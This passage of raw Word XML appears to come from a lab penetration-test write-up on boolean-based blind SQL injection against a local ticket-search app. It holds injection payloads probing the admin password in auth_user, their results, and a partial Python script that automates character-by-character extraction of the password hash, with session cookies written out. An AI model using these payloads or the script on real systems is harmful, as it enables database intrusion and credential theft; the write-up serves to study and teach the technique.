          <w:p w14:paraId="3F625714" w14:textId="29A4C3AE" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>q=zzzz'</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>UNION</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>SELECT NULL,'x',NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>(SELECT</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>LENGTH(password)</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>FROM</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>auth_user</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>username='admin')</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001221CA">
              <w:t>0--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F971736" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="001221CA">
        <w:t>The condition is trivially true (any stored password has a length greater than 0), and the response confirmed this with "1 match." and the injected marker row, with no actual password data shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32622771" w14:textId="242920D5" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750D5C6D" wp14:editId="73E83DCF">
            <wp:extent cx="6858000" cy="2914650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94738698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858000" cy="2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8FF60F" w14:textId="7F621716" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 4.2a: True condition (LENGTH(password)&gt;0) – “ 1 match.”, no data displayed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001221CA" w:rsidRPr="001221CA" w14:paraId="41005DCB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FDF9FBF" w14:textId="4D133EFF" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="007D607C">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>q=</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>=zzzz'</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>UNION</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>SELECT NULL,'x',NULL,NULL</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>(SELECT</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>LENGTH(password)</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>FROM</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>auth_user</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>username='admin')</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidR="007D607C">
              <w:t>+100</w:t>
            </w:r>
            <w:r w:rsidR="007D607C" w:rsidRPr="001221CA">
              <w:t>0--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="461B14E1" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="001221CA">
        <w:t>The condition is trivially false (no password hash is 1000 characters long), and the response confirmed this with "0 matches." and no injected row. This established a reliable, repeatable true/false signal to automate against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FCD74E" w14:textId="1C57BED9" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C9FC5EC" wp14:editId="477BD005">
            <wp:extent cx="6848475" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="19536609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848475" cy="2933700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68FD42" w14:textId="6075D86B" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 4.2b: False condition (LENGTH(password).1000) – “0 matches.”, no data displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6058F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:t>4.3 Automating the Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D03C28" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:t>Burp Community's Intruder throttles requests to about one per second and lacks scriptable payload logic, so I wrote a Python script (blind_extract.py) to drive the oracle directly. The script performs a binary search over LENGTH(password) to find the hash's total length, then performs a binary search over ASCII values for each character position using ascii(substring(password from pos for 1)) &gt; N, cutting the search space from 95 characters to about 7 requests per position.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001221CA" w:rsidRPr="001221CA" w14:paraId="10070055" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AD314B7" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ECE8B25" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>Objective 4 - Boolean-based blind SQL injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BCDC09" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>Recovers auth_user.password for username='admin' one character at a time,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C523E0E" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>using only the match-count oracle (no data is ever reflected in the response).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A23716F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC37AB3" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72471AE3" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDF6C07" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1240223C" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>BASE = "http://127.0.0.1:5001/tickets/search/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416E1B88" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3823120A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t># Grab a fresh sessionid/csrftoken from Burp before running.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3477D71C" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>COOKIES = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74841FF7" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    "csrftoken": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCB3BEC" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    "sessionid": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC68383" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70AFE399" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>HEADERS = {"User-Agent": "Mozilla/5.0"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26BB4877" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79D7B5A6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>SUBQUERY = "SELECT password FROM auth_user WHERE username='admin'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636098E3" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0BD638C6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:lastRenderedPageBreak/>
              <w:t>def oracle(condition_sql: str) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="344CC485" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    """True if the injected UNION row appears (i.e. condition_sql is true)."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="001BEBD3" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    payload = f"zzzz' UNION SELECT NULL,'x',NULL,NULL WHERE {condition_sql}--"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A32B865" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    r = requests.get(BASE, params={"q": payload}, cookies=COOKIES, headers=HEADERS)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D8E41F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    m = re.search(r"(\d+)\s+match", r.text)  # matches "1 match." and "N matches."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B42A91" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    count = int(m.group(1)) if m else 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FD1C415" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    return count &gt; 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5C3771" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75C7AD69" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>def get_length(subquery: str) -&gt; int:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08547A4D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    lo, hi = 0, 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE497D8" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    while lo &lt; hi:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA1F1F6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        mid = (lo + hi) // 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECC68ED" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        if oracle(f"LENGTH(({subquery})) &gt; {mid}"):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52E1F7A1" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>            lo = mid + 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41E5C9C8" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="277AE5E2" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>            hi = mid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30D1DBFB" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    return lo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF0ED98" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1ED7D004" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>def get_char(subquery: str, pos: int) -&gt; str:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5853DD3A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t xml:space="preserve">    lo, hi = 32, 126 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245AE79E" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    while lo &lt; hi:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E74614E" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        mid = (lo + hi) // 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C5BD0F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        cond = f"ascii(substring(({subquery}) from {pos} for 1)) &gt; {mid}"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F2CC7A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        if oracle(cond):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729B50F7" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>            lo = mid + 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B7DFC41" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B433270" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>            hi = mid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF2D0F3" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    return chr(lo)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D46C116" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E6A356C" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>def main():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B902E33" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    length = get_length(SUBQUERY)</w:t>
            </w:r>
          </w:p>
